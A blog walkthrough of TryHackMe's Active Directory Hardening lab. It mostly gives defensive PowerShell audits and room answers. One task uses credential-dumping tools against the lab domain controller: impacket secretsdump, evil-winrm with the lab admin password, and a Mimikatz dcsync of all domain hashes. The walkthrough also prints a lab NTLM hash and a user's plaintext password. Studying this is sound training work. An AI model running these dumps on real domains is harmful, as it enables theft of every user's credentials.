Active Directory Hardening TryHackMe Walkthrough

Rich
4 min read · Sep 12, 2023


TL;DR TryHackMe is running a promotion for the new Security Engineer pathway! Refer a friend, complete rooms, write one of these walkthroughs, etc. for a chance to win stuff! Also, here’s a walkthrough of the AD Hardening room.

A full list of our TryHackMe walkthroughs and cheatsheets is here.

Background

Run, don’t walk, to the new TryHackMe Security Engineer pathway. Complete rooms, refer a friend, do a writeup, let your company know about TryHackMe training, and you, yes you, could win some great stuff like a free year of TryHackMe or a laptop.

Here at test.local we had the day off so we immediately knocked out the Active Directory Hardening room in the pathway.

The room is very basic and introductory, but it’s a great start. It covers basic security hygiene such as:

  • Requiring SMB & LDAP signing
  • Enforcing a minimum password length
  • Least privilege
  • Privilege tiers (the tiered admin model)
  • Compliance with baselines
  • Protecting against common attacks such as Kerberoasting

The room left out a few things that should be done in most Windows domain environments:

  • Disabling LLMNR & NetBIOS name resolution (NBT-NS), so that poisoning tools have nothing to answer
  • Configuring LAPS on any workstation OUs, so that local admin passwords are unique per host
  • Using the Protected Users group for privileged accounts
  • Marking privileged user accounts as “sensitive and cannot be delegated”
  • Considering smartcards [they can be expensive, but they’re cheaper than a breach]

The room did however list other TryHackMe rooms that cover much of the above.
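As an added example (not code from the room or from this walkthrough), here is a read-only audit of three of the items the room skips: LLMNR, NetBIOS over TCP/IP, and Protected Users / delegation on privileged accounts. The remediation for each check sits in a comment next to it. It assumes the RSAT ActiveDirectory module is installed and that you have local admin on the host being checked; the function names are my own.

```powershell
# Added example, not from the room or this walkthrough. Read-only checks for
# LLMNR, NetBIOS over TCP/IP, and Protected Users / delegation on privileged
# accounts. Assumes the RSAT ActiveDirectory module and local admin on the host.
Import-Module ActiveDirectory

function Test-LlmnrDisabled {
    # The GPO "Turn off multicast name resolution" writes EnableMulticast=0 here.
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient'
    $v = Get-ItemProperty -Path $key -Name EnableMulticast -ErrorAction SilentlyContinue
    return ($null -ne $v -and $v.EnableMulticast -eq 0)
    # Fix: New-Item -Path $key -Force | Out-Null
    #      Set-ItemProperty -Path $key -Name EnableMulticast -Value 0 -Type DWord
}

function Get-NetbiosEnabledInterfaces {
    # NetbiosOptions: 0 = use DHCP setting, 1 = enabled, 2 = disabled.
    $base = 'HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces'
    Get-ChildItem -Path $base |
        ForEach-Object { Get-ItemProperty -Path $_.PSPath } |
        Where-Object { $_.NetbiosOptions -ne 2 } |
        Select-Object PSChildName, NetbiosOptions
    # Fix (per interface): Set-ItemProperty -Path <PSPath> -Name NetbiosOptions -Value 2
}

function Get-PrivilegedAccountGaps {
    # adminCount=1 is stamped on accounts that are (or once were) in protected
    # groups; it is a cheap first pass, not a complete list of privileged users.
    $protected = @(Get-ADGroupMember -Identity 'Protected Users' -Recursive |
                   Select-Object -ExpandProperty SamAccountName)
    Get-ADUser -Filter 'adminCount -eq 1 -and Enabled -eq $true' `
               -Properties AccountNotDelegated |
        Where-Object { $_.SamAccountName -ne 'krbtgt' } |
        ForEach-Object {
            [pscustomobject]@{
                User             = $_.SamAccountName
                InProtectedUsers = $protected -contains $_.SamAccountName
                NotDelegated     = [bool]$_.AccountNotDelegated
            }
        } |
        Where-Object { -not $_.InProtectedUsers -or -not $_.NotDelegated }
    # Fix: Set-ADAccountControl -Identity <user> -AccountNotDelegated $true
    #      Add-ADGroupMember -Identity 'Protected Users' -Members <user>
    # Protected Users blocks NTLM, RC4/DES Kerberos, delegation and cached logon,
    # so stage it on a test account first and keep a break-glass account outside it.
}

"LLMNR disabled: $(Test-LlmnrDisabled)"
Get-NetbiosEnabledInterfaces | Format-Table -AutoSize
Get-PrivilegedAccountGaps   | Format-Table -AutoSize
```

Run it on a domain-joined workstation for the two registry checks and on any host with RSAT for the AD check. The registry checks only tell you what the local machine has applied; to confirm the setting is actually enforced domain-wide, look at the GPO that sets it and its link scope rather than trusting one host.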

Well that’s enough theory, let’s put our hands on the keyboard, connect to the VM, and start finding some answers.

xfreerdp /v:10.10.66.5 /u:Administrator /p:tryhackmewouldnotguess1@ /dynamic-resolution

— Task 2 —

What is the root domain in the attached AD machine?

Get-ADDomain

Or if you want just the answer:

(Get-ADDomain).DNSRoot

tryhackme.loc

— Task 3 —

What is the default minimum password length (number of characters) in the attached VM?

Get-ADDefaultDomainPasswordPolicy

Or if you want just the answer:

(Get-ADDefaultDomainPasswordPolicy).MinPasswordLength

7
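The default domain policy is not the whole story: a fine-grained password policy (PSO) applied to a group or user overrides it, so a domain with a 14-character default can still have a 7-character policy on its admins. As an added example (not from the room), this compares the default policy and every PSO against a baseline; the 14-character minimum and 24-password history are assumed baseline values, and the function name is my own. It assumes the RSAT ActiveDirectory module.

```powershell
# Added example, not from the room. Compare the default domain policy and every
# fine-grained password policy (PSO) against a baseline. Assumes the RSAT
# ActiveDirectory module; the baseline numbers are assumptions, adjust to taste.
Import-Module ActiveDirectory

function Get-PasswordPolicyGaps {
    param([int]$MinLength = 14, [int]$MinHistory = 24)

    $d = Get-ADDefaultDomainPasswordPolicy
    $policies = @([pscustomobject]@{
        Name              = 'Default Domain Policy'
        AppliesTo         = '(everyone without a PSO)'
        MinPasswordLength = $d.MinPasswordLength
        ComplexityEnabled = $d.ComplexityEnabled
        PasswordHistory   = $d.PasswordHistoryCount
        LockoutThreshold  = $d.LockoutThreshold
    })
    # PSOs win over the default policy for the users/groups they apply to.
    $policies += @(Get-ADFineGrainedPasswordPolicy -Filter * | ForEach-Object {
        [pscustomobject]@{
            Name              = $_.Name
            AppliesTo         = ($_.AppliesTo -join '; ')
            MinPasswordLength = $_.MinPasswordLength
            ComplexityEnabled = $_.ComplexityEnabled
            PasswordHistory   = $_.PasswordHistoryCount
            LockoutThreshold  = $_.LockoutThreshold
        }
    })

    foreach ($p in $policies) {
        $issues = @()
        if ($p.MinPasswordLength -lt $MinLength) { $issues += "length $($p.MinPasswordLength) < $MinLength" }
        if (-not $p.ComplexityEnabled)          { $issues += 'complexity off' }
        if ($p.PasswordHistory -lt $MinHistory) { $issues += "history $($p.PasswordHistory) < $MinHistory" }
        if ($p.LockoutThreshold -eq 0)          { $issues += 'no lockout' }
        if ($issues) {
            [pscustomobject]@{
                Policy    = $p.Name
                AppliesTo = $p.AppliesTo
                Issues    = ($issues -join ', ')
            }
        }
    }
}

Get-PasswordPolicyGaps | Format-Table -AutoSize
```

On the room's VM this should flag the default policy for its 7-character minimum; any PSO that appears in the output is worth a closer look, because PSOs are usually created for exactly the accounts you care most about.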

— Task 5 —

Find and open BaselineLocalInstall script in PowerShell editor — Can you find the flag?

Get-Content (Get-ChildItem -Path "C:\Users\Administrator\Desktop\Scripts" -Include "*BaselineLocalInstall*" -File -Recurse -ErrorAction SilentlyContinue).PSPath | Select-String "THM{" -SimpleMatch

THM{00001}

Find and open MergePolicyRule script (Policy Analyser) in PowerShell editor — Can you find the flag?

I couldn’t find the “MergePolicyRule.ps1”. I think it was supposed to be “Merge-PolicyRule.ps1”.

Get-Content (Get-ChildItem -Path "C:\Users\Administrator\Desktop\Scripts" -Include "*.ps1" -File -Recurse -ErrorAction SilentlyContinue).PSPath | Select-String '\{[A-Z0-9]+\}'

{THM00191}

Alt:

Get-Content (Get-ChildItem -Path "C:\Users\Administrator\Desktop\Scripts" -Include "*.ps1" -File -Recurse -ErrorAction SilentlyContinue).PSPath | Select-String "Flag :" -SimpleMatch

— Task 6 —

As per the generated report, how many users have the same password as aaron.booth?

Initially I just ran secretsdump from Kali, since after all we already have a Domain Admin login.

cd /home/kali/Downloads/impacket-master/examples

python3 secretsdump.py -just-dc-ntlm za/Administrator@10.10.66.5

However, this is not a good way to get a count of matching NTLM hashes, so I copied Invoke-Mimikatz.ps1 to the VM and ran it there. This can be done via evil-winrm. (Our Mimikatz cheatsheet is here if you are not familiar with it.)

evil-winrm -i 10.10.66.3 -u Administrator -p tryhackmewouldnotguess1@

upload /home/kali/Downloads/exploits/PowerShell/Invoke-Mimikatz.ps1

Or one can just copy/paste it over RDP.

Dump all the hashes to a file.

Invoke-Mimikatz -Command '"lsadump::dcsync /domain:za.tryhackme.loc /all"' | Out-File .\AllCreds.txt

Find aaron.booth’s NTLM.

Get-Content .\AllCreds.txt | Select-String aaron.booth -Context 5

Copy/paste aaron.booth’s hash and get a count of total matches.

(Get-Content .\AllCreds.txt | Select-String "64f12cddaa88057e06a81b54e73b949b").Count

Just subtract 1, since aaron.booth is one of the matches.

186

By the way, there were 5,046 AD users on the VM, so quick queries like the above are a workable way to get a count quickly and easily.

In case anyone else is curious, aaron.booth’s plaintext password is Password1.

Summary

I’m always happy to see TryHackMe roll out a new pathway. This one looks promising and is a good way to keep getting hands-on practice and to keep learning.

References

NTLM: https://learn.microsoft.com/en-us/windows/win32/secauthn/microsoft-ntlm

Dumping all domain hashes with Mimikatz: https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/


Rich

I work various IT jobs & like Windows domain security as a hobby. Most of what’s here is my notes from auditing or the lab.